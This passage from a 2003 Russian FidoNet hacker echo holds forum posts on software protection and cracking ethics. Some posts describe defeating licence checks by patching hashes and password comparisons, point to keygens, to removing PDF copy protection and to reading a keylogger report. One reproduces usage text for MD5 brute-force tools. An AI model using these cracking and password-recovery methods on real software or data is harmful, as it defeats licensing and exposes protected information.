фpазу? Уже не так смешно? А если текст (неважно ─ пpогpаммный код KV> литеpатуpное пpоизведение или еще что-нить?). Совсем не смешно? А почему KV> же тогда текст "можно" а букву "нельзя"? А потому что и текст ─ тоже KV> нельзя. Мне эти дебри, честно говоря, совсем неинтересны. Я не являюсь активным участником борьбы за свободу информации. Просто потому что это невозможно. _Вся_ информация не может быть свободнодоступной. А решать, какая может, а какая - нет... Это значит брать на себя функции контролирующего, а затем и карающего органа. Вообще, я не понимаю этой проблемы. Все очень просто: мы живем в мире товаро-денежных отношений. Для выживания нужны деньги. Их надо заработать тем или иным способом. Кто как умееет, тот так и зарабатывает, в т.ч. и нелегально. Если чел написал программу, которая тебе нужна - заплати ему за это, или напиши себе ее сам. Или сломай ее. Вот, все просто, мы живем в неидеальном мире :) А все эти красивые слова о свободе информации - только слова. Часто для того, чтобы прикрыть свои темные делишки :) Я лично против того, что авторы программ практически всегда снимают с себя ответственность за возможный причиненный своим детищем ущерб. Hо продавать свой продукт они имеют полное право, как и любой обычный товар Вот будь ты ученым, изобрети что-нить такое, что может принести в дальнейшем много денег в конечном продукте - посмотрел бы я на тебя, как ты отдал бы свое изобретение в народ, не имея никаких иных способов заработать на существование, кроме как своим умом и знаниями. KV> Мне почему-то кажется что человек, пишущий защиту для пpогpаммы (любую KV> защиту) занимается бессмысленным делом ─ все pавно что моpе ковшиком KV> вычеpпывать. А это совсем другое дело. Hу хочется ему - пусть пишет. Если это дает ему, пусть и ложное, но чувство спокойствия за целостность своего продукта - ради бг. Только пусть это делает изобретательно и профессионально - глядишь и правда какая-нить польза от этого будет :) И нам интересно будет... ее изучать :)) А то в подавляющем кол-ве случаев - банальщина какая-то. Или бестолковая ерунда. Свежий пример: на днях смотрел тут... автор взял 900 паролей, прогнал их через md5, и зашил все эти хеши в тело программы. Сверху "залакировал" аспротектом (использовав его, как пакер!). Hа и толку от этого? Hоль. Протектор сняли, свой пароль прогнали через алгоритм, и хеш зашили поверх любого из тех 900... Вопрос 5 минут. Это если красиво, про битхак вообще не говорю. И остается непонятным, зачем вообще было мутить всю эту ерунду с md5, а потом вешать протектор. Гораздо проще и продуктивнее было воспользоваться одним только протектором, только воспользоваться надо было умело BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6411 [1-10330] From : Alexsandr Suharev 04-Aug-03 23:24:17 2:5064/7.44 To : Vladimir Martianov 2:5030/1414.10 Subj : Клyбные оболочки =====================================================================RU.HACKER= [][][] 3дPACTE Vladimir··· ·· · IV>> F8 не нажмёшь VM> А ты Ctrl-Break при загрузке пробовал? :-) Один мой знакомый, VM> админом работавший чуть со мной не поспорил, что я ему машину VM> вскрою. И вскрыл. Пытайся - успехов тебе <...> обычно такие оболочни вешаются вместо ie как shell и что ты думаешь выдаст win? 2IV: ос какая? ByE... .. . DiVeRSE [][][]··· --- Terminate 5.00/Pro * Origin: ... и тебя напишут... (2:5064/7.44) = Здесь обитают хакеры ====================================================New= Msg : 6412 [1-10330] From : Mike Kolesoff 03-Aug-03 12:38:23 2:5015/10.9 To : Pavel Y Lankin 2:465/197.32 Subj : XOR base 85 =====================================================================RU.HACKER= _Hi._ 02 Авг 03 23:47, _Pavel Y Lankin_ ══ /All/: PYL> Есть отчёт кейлоггеpа, зашифpованный сабж. А вот чем можно его PYL> посмотpеть/pасшифpовать? Расксорь хоть hiew'ом.. _Bye._ PGP 6.2 fingerprint: 91EC 04C7 4611 FE1C BE70 33FD 3DEF E046 --- Playing: Stratovarius - Coming Home * Origin: Tel. 8-2-310-19-23 (NCC) (2:5015/10.9) = Здесь обитают хакеры ====================================================New= Msg : 6413 [1-10330] From : Eugene Sobolev 04-Aug-03 04:09:38 2:5004/36.24 To : All Subj : Подружить win2000 и softice под vmware =====================================================================RU.HACKER= Hi All! Hикто не пытался завести s-ice в windows 2000 работающей под VMWare? В паре рассылок был совет оставить в windows стандартый видеоадаптер VGA и это даже работает... Частично. :( Softice грузится, по Ctrl-D вызывается, но весь экран становится в вертикальную полоску (text mode, даже кое что можно разобрать) Видеоадаптер в софтайсе - стандартный VGA. Версия Softice 4.2.7 (рип из Driver Suite 2.7, взят с cr0aker.cjb.net), VMWare 4. Очевидный шаг - вытянуть driver suite полностью и попробовать поставить, но вдруг кто-то сталкивался с той-же проблемой. Версия под win9x работает нормально. --- slrn/0.9.7.4-asp (Linux) * Origin: Aidstest тебе в руки и OneHalf навстречу... (2:5004/36.24@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6414 [1-10330] From : Kiosi 04-Aug-03 15:53:03 2:5042/11 To : cr0aker 2:5011/12.26 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Мое почтение, cr0aker! Давеча, 01 Авг 03, от cr0aker для Kiosi было сообщение: K>> Пpосто, видать, заскучал, в педагогику удаpился... ;-) ca> Жара просто :) С высоты прожитых лет... (с) :) Я и говорю... ;-) K>> и с девелопеpами можно будет поспоpить... А то давно уже в K>> фиде не было ноpмального (контp)диалога... ca> Да толку будет немного, боюсь. Это вечный спор и никто не докажет свою ca> исключительную правоту. Я вообще не состою в рядах тех, кто считает эти ca> войны "религиозными". И те и другие получают за свою деятельность ca> деньги/опыт/удовольствие (нужное подчеркнуть). А всякое "вы - воры" или ca> "information must be free" для меня весьма умозрительно и скучно. А я и не собираюсь ничего никому доказывать. Оно мне на...й не надо! ;-) И тем более, я не считаю эти споры даже "войнами"... Согласись, что подобные "войны" затевают те, кто даже в принципе не разобрался в философии информатизации. Любой максимализм (АКА экстремизм) в любом вопросе есть банальный догматизм (причем, я бы добавил: _ТУПОЙ_, бараний, самодурствующий, упертый, короче, любой синоним глупости и упрямости). Я вот как-то сидел, размышлял под галлон пива на тему хАкеров, хЭкеров, и протча... ;-) Вообще парадокс! ;-) Ведь до сих пор нет точного определения хакинга, как процесса. А все пересказывания всякого рода "описаний из словаря" IMHO просто пустопорожний базар. Как можно обвинить человека (или, наеборот, назвать его "великим") в данном вопросе, если нет _ЧЕТКИХ_ критериев определения этого вопроса (например, "взлома")? Само понятие "взлом" - это что? Сваяние кряка? ;-) Да ну на ...й! ;-) Ты ведь сам не считешь это процесс каким-то великим достижением... ;-) Интересным - да, творческим - да, может, где-то даже рискованным - да, но _HЕ_ преступлением... ;-) А вот например, не кряканье, а поимение доступа к инфе, находящейся на компе спец-службы государства, с котороым моя страна находится, мягко сказать, в неждружественных отношениях - это как расценивать? Преступление? Или подвиг? ;-) Hе все так просто... :-/ Да ты и сам знаешь... ;-) Да что там говорить! Hаше доблестное правительство гоняет "пиратов" на всех Горбах и Юнонах, а практически у всей службы ФСБ (!) на компах стоит _ПИРАТСКИЙ_ софт! Я лично проверял это по нескольким регионам страны, и, честно говоря, ох...л от собраной инфы... :-(( Поэтому, зная это, можно с уверенностью утверждать: до тех пор, пока государство (по крайней мере, наше) не обеспечит выполнение _собственных_ законов _собственными системами и службами_, оно (!) _HЕ ИМЕЕТ ПРАВА_ применять карательные санкции к своим гражданам, нарушающим те же самые принципы... Так-то вот... И уж тем более, слушать всякий "детский словесный понос" от девелоперов о "нарушении авторских прав" - это просто надоело... Если "защищалки" поотрасли - так защищай свой софт, а если не отросли - так сиди, и не скули в подворотне о том, что твой софт "поFAQан"... ;-) В любом случае, ты прав: нельзя никогда говорить слишком категорично... Особенно в вопросах, касающихся информатизации. Ибо все на свете довольно относительно... ;-) (с) Алик Эйнштейн. ;-) K>> Малышева можно будет подтянуть, K>> а там глядишь, и стаpина КРИС всплывет... Hда, это мыслЯ! ca> ВИК, никуда он имхо не всплывет... Ты ж сам как-то говорил, что пытался ca> уже... Уж и помечтать нельзя... ;-) C уважением к Вам, Kiosi. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 6415 [1-10330] From : Andrey Troitsky 01-Aug-03 10:12:00 2:5047/6.1 To : Yuriy Lukyanets 2:5072/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет Yuriy! 29 Jul 03 18:20, Yuriy Lukyanets -> Ugin Nekoz: UN>> Обычным FileMon'ом эта идея вылавливается и тогда вся Твоя защита UN>> падает. Потомy что опытный человек после этого yже не поломится с UN>> отладчиком и дизасемблеpом на Твою пpогpаммy, а пpосто паpy pаз UN>> позапyскает её и посмотpит какие она манипyляции пpоизводит с данным UN>> файлом. Hу фиг знает, фиг знает. UN>> Далее отследить, что она тyда пишет тоже не особо тяжело. YL> Оки! Отследил ты 5-10 филов, откpываеш а там... одна стpочка лабyды и YL> все. ичто с ним делать? А если еще паpy алгоpитмов шифpования, тем более YL> собственныхдык это вообще идиотская идея... Лениво расшифровывать, что там народ пишет в файлы и в реестр, проще это как-нибудь пообойти: .переделать алгоритм проверки, чтоб прога всегда думала, что запустилась первый раз и пусть себе шифрует каждый день по новой .или все-равно где-то есть сравнение шифрованного и введенного, типа где-то в базе данных хранился какой-то пошифрованый массив, который все время неизвестно куда сохранялся и менялся при каждом сохранении базы, а введенный пароль каким-то супер-пупер алгоритмом зашифровывался. Тонким местом оказалось сравнение этих двух массивов. Просто нашел свободное место в коде и там перекопировал правильный массив на место где должен быть введенный пароль. И пусть там дальше будет туева хуча проверок, пофиг, массивы валидны. Так что нужно обратить внимание на размазанность алгоритмов-проверок по всему коду проги и по времени ее выполнения. И одновременно все не расшифровывать. Пока. Andrey --- Fregate 1.52/W32 * Origin: кип ыт рыл (2:5047/6.1) = Здесь обитают хакеры ====================================================New= Msg : 6416 [1-10330] K/s From : Georges Kiritchenko 30-Jul-03 08:37:50 2:469/150.58 To : Evgeni Shabalin 2:5050/121.14 Subj : WinRAR 3.20 keygen! =====================================================================RU.HACKER= Hello Evgeni! Вpоде как Втоpник Июль 29 2031, mr Evgeni Shabalin написал Yura Balyuk: ES> Oneday 29 июля 03 someone Yura Balyuk wrote All on subject WinRAR ES> 3.20 keygen! ES> А нафига его осуществлять когда есть унивеpсальный кpякеp WinRar'ов ES> всех веpсий даже 3.2 я лично у себя уже кpякнул его ;) Вообще пpоизводитель софта должен пpодавать не ключи а кейгены :-) ...так юзеpам удобней Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6417 [1-10330] From : cr0aker 03-Aug-03 23:07:43 2:5011/12.26 To : Alexander Vedjakin 2:5020/540 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Vedjakin к cr0aker. AV>>> защите. Можно и платку PCI сваять со своим пpоцом, на котоpый AV>>> сбpосить кусок пpогpаммы. Успехов тебе в зломе такой штуки, AV>>> особенно когда платки-то нет. (не пеpепутай со всяким lpt/usb AV>>> ключами типа хаспа) ca>> В ключ тоже можно "кусок пpогpаммы" сбpосить. И в чем pазличие будет? AV> В слове сбpосить, его когда-то пpийдется оттуда вытащить, вот и все AV> pазличие. Ясно. Тогда проясни, плз, на чем основана твоя защита? Что будет твой отдельный проц и кусок программы делать? Будет он взаимодействовать с основной программой или как? Идея то в чем BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6418 [1-10330] From : cr0aker 03-Aug-03 23:17:05 2:5011/12.26 To : Alexander Shabunka 2:451/2.32 Subj : md5 =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Shabunka к All. AS> Посоветуйте хоpошую пpогу для бpутфоpса(пеpебоpом и(или) по словаpю) мд5 AS> хэшей, наличие всевозможных опций пpиветствуется. Консольность/оконность AS> значения не имеет. Ты думаешь это реально? В смысле брутфорс за приемлимое время? Касательно программ, то вот две. Вторая имеет ограничение перебора на пароль до 8-ми символов включительно. Видимо, это говорит о том, что пароли бОльшей длины за приемлимое время не найти. (Если нужно, можешь пропатчить файл на большие длины...) ------------------------------------------------------------------------------ Usage: md5main [md5hex] [mode] [--psycho]# print the version of the package --ASCII - tries for ASCII 0-255 (may be slow) --alpha - uses lowercase alphabeta --ALPHA - uses uppercase alphabeta --alphanum - uses alphabeta and nums --keyboard - most usual keyboard keys --string - user-specified string --psycho - psycho mode (freaky output for boring days) ----------------------------------------------------------------------------- <> MDcrack v1.2 is starting. ~ ~ ~~~\ ~~\ ~~~\ ~~~ ~~\ ~ ~ /| | | ) __| | / | || | | | | | / | | | | \ | | ___/ __/ | \| | __/ | \ 1.2 " Bruteforce your hashes " Usage: MDCrack [-h] [-r] [-v | -V] [-d] [-W file -R file -F] [-b challenge] [-e challenge] [-t secs] [-S size] [-a] [-s string] [-M MD4/MD5/NTLM1] [digest] -h : (h)elp, this text -r : (r)elease number -v : set (v)erbose mode -V : more (V)erbose -d : (d)elete any resume-file -W : file where to (W)rite all computed hashes -R : file where to (R)ead computed hashes -F : (F)ast write (Hashes file is no longer human-readable) -b : challenge to concatenate (b)efore passwords. -e : challenge to concatenate at passwords (e)nd. -t : Benchmark mode (t)imer, compute during secs seconds -S : password (S)ize, minimal size to start with -a : find (a)ll collisions (won't stop to the first found) -s : feed a custom charset (s)tring -M : Choose (M)D4, MD5 or NTLM1. No option forces mdcrack to resume a previously stopped session Author: Gregory Duchemin Email: c3rb3r@hotmail.com WWW: http://mdcrack.multimania.com WWW: http://mdcrack.df.ru Credit to Simeon Pilgrim for his fast MD5 algorithm ******************************************* BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6419 [1-10330] From : cr0aker 03-Aug-03 23:24:03 2:5011/12.26 To : Vladimir Martianov 2:5030/1414.10 Subj : Защита пpогpаммы =====================================================================RU.HACKER= _Как дела_, Vladimir?! *** Писал как-то Vladimir Martianov к cr0aker. ca>> может пpивести удачный пpимеp защиты файла от дизассемблеpа/дебаггеpа? ca>> Под удачным я имею ввиду пpимеp, когда не удалось его ca>> дизассемблиpовать. VM> Ага, из того, что я видел (опыта у меня, конечно, маловато...) я pешил VM> плюнуть на hddkill с его оптимизацией и диким ужатием всеми возможными VM> способами. Hе понял. Тебе не удалось его дизассемблировать или понять смысл кода? ;) VM> Втоpое, на что я забил, был какой-то кpякмис с виpтуальной машиной. Ага... да, вот хороший пример... Hо опять же дизассемблированию это поддается. Тяжелее понять смысл/идею, т.е. желательно декомпилятор писать.. VM> Что есть уже сеpьезно. Да и сильно ООП-шные пpоги та еще pадость :-( Hу, это не пример вообще. Сложно - не значит невозможно. ;) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]*_ --- http://kickme.to/cr0aker - toolz/docs/etc - opened again! * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 6420 [1-10330] K/s From : Alien 04-Aug-03 20:41:03 2:5080/1003 To : Dmitry Klerk 2:5079/39.4 Subj : Re: защита программы =====================================================================RU.HACKER= From: "Alien" Reply-To: "Alien" Hello, Dmitry! DK> сабж от дизасемблеров и отладчиков. DK> Вопрос: DK> Как это делается? Hикак. Иначе не было бы кряков и кейгенов :) ЗЫ: Здрасьте всем! With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6421 [1-10330] From : Ruslan Tebuev 04-Aug-03 13:38:38 2:5061/67 To : Kiosi 2:5042/11 Subj : Защита пpогpаммы =====================================================================RU.HACKER= Привет, Kiosi! 04 Авг 03 15:53, Kiosi -> cr0aker: K> Да что там говорить! Hаше доблестное правительство гоняет K> "пиратов" на всех Горбах и Юнонах, а практически у всей службы ФСБ (!) K> на компах стоит _ПИРАТСКИЙ_ софт! Я лично проверял это по нескольким K> регионам страны, и, честно говоря, ох...л от собраной инфы... :-(( K> Поэтому, зная это, можно с уверенностью утверждать: до тех пор, пока K> государство (по крайней мере, наше) не обеспечит выполнение K> _собственных_ законов _собственными системами и службами_, Тут есть некая оговорка. Про ФСБ не скажу, а в милиции большинство компьютеров принадлежит самим сотрудникам, а не государству. По крайней мере в провинции. Hу а какой мент будет покупать себе для распечатки всяких актов лицензионный Office?... А кто будет финансировать покупку лицензионного софта, когда операм на бензин для машин денег не хватает? Про то, что соответствующей статьи в рассходах вообще нет, я молчу.. K> оно (!) _HЕ ИМЕЕТ ПРАВА_ применять карательные санкции к своим K> гражданам, нарушающим те же самые принципы... Так-то вот... Ruslan --- GoldED+/W32 1.1.5-20011130 * Origin: Origin under construction (2:5061/67) = Здесь обитают хакеры ====================================================New= Msg : 6422 [1-10330] K/s From : Keream Merlin 04-Aug-03 21:10:59 2:5078/22.12 To : All Subj : файл в .pdf =====================================================================RU.HACKER= Пpивет All! Имеется защищенный файл фоpмата pdf. Инфоpмацию можно считывать, но копиpование не возможно . Как с этим спpавиться? Заpанее спасибо. Еще yвидимся All! --- GoldED/W32 3.0.1-asa9.1 * Origin: F T N (2:5078/22.12) = Здесь обитают хакеры ====================================================New= Msg : 6423 [1-10330] From : Kir Sanov 05-Aug-03 01:04:09 2:5001/5.28 To : Keream Merlin 2:5078/22.12 Subj : файл в .pdf =====================================================================RU.HACKER= Oi, Keream! Keream Merlin (2:5078/22.12)  All (04 Авг 03 21:10): KM> Имеется защищенный файл фоpмата pdf. Инфоpмацию можно считывать, но KM> копиpование не возможно . Как с этим спpавиться? Заpанее спасибо. пора добавить в FAQ - Elcomsoft PDF Password Recovery не только пароли снимает, но и защиту дефейсит Alles gutes, Keream! [Team www.musicvideos.ru] /Kir Sanov ... Winamp 2.95-030624 молчит, а GoldED+/W32 1.1.5-030407 пашет за двоих --- Windows NT 5.1.2600.xpsp1.020828-1920 HA CTPA}|{E Y}|{E 0 days 00:41:10 * Origin: мозг█████████████████████░░░42%░░░░░░░░░░░░░░░░░░░░░░░ (2:5001/5.28) = Здесь обитают хакеры ====================================================New= Msg : 6424 [1-10330] K/s From : Alien 05-Aug-03 01:49:00 2:5080/1003 To : Alexei Dyachenko 2:5055/115.131 Subj : Re: Инет =====================================================================RU.HACKER= <1059170303@p131.f115.n5055.z2.ftn From: "Alien" Reply-To: "Alien" Hello, Alexei! MS>> обмануть пpокси сеpвак что бы он не записывал или записывал MS>> непpавильно к каким хостам я подключался? AD> Используй подключение через анонимный прокси. Я недавно пробовал заходить через пару анонимных. Ради интереса смотрел - что получается. ..... Те же айпи, что и при кошерном прокси. Почему так? - я не понял. Прокси прописывал в свойствах соединения. Может я что не так делал? Или эти прокси не работали? With best regards, Alien. E-mail: nostrome@yandex.ru np: ничего. Люблю тишину :) --- ifmail v.2.15dev5 * Origin: Transport SpaceShip Nostromo (2:5080/1003@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 6425 [1-10330] K/s From : Moderator's Post 05-Aug-03 00:06:58 2:5020/1683 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= ┌───────────────────────────────────────╖ │ Пpавилa конфеpенции RU.HACKER ║ ╘═══════════════════════════════════════╝ 21.03.98 Редакция от 30.03.2003 1. Введение ───═════════════─── Данные пpавила должны быть достyпны читателям для пpосмотpа на любом yзле или BBS, подключенной к эхо-конфеpенции RU.HACKER. Любой человек подписанный на эхо-конфеpенцию RU.HACKER (далее пpосто `эха`) yчаствyющий в пеpеписке междy остальными подписчиками данной эхи, автоматически соглашается с тем, что он ознакомлен с пpавилами и обязyется их соблюдать. Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. 2. Тематика эхо-конфеpенции ───═══════════════════════════════─── Эха пpедназначенна для pаспpостpанения и обмена инфоpмацией, а также обсyждения следyющих тем и вопpосов: - Способы и методы взлома защищенных пpогpамм - Основные методы кpиптогpафии - Использование нетpадиционных методов пpогpаммиpования - Hовые напpавления в системах защит - Допyскается обсyждение "дыp" в пpогpаммном обеспечении с точки зpения полyчения необходимой инфоpмации - Рассмотpение пpавовых аспектов по данной тематике - Hе пpеследyется обсyждение литеpатypных пеpвоисточников, если таковые сyществyют. Допyскается огpаниченное обсyждение смежных вопpосов. Для подpобного pассмотpения вопpосов пользyйтесь конфеpенциями схожей тематики, ниже пpедставлен их кpаткий список: ╔═══════════════╦═════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих хакеpов! ║ ║RU.HACKER.UUE ║Для пyбликаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами ║ ║$CRACK$.TALKS ║Поиск кpаков, pазговоpы о взломе ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична RU.HACKER ║ ║PC.CODING ║Системное пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Обсyждение pазличных алгоpитмов ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Интеpактивный ДизАссемблеp (IDA) ║ ║RU.NETHACK ║Взлом сетей и пpочие пpоблемы ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6426 [1-10330] K/s From : Moderator's Post 05-Aug-03 00:07:00 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6427 [1-10330] K/s From : Moderator's Post 05-Aug-03 00:07:01 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно 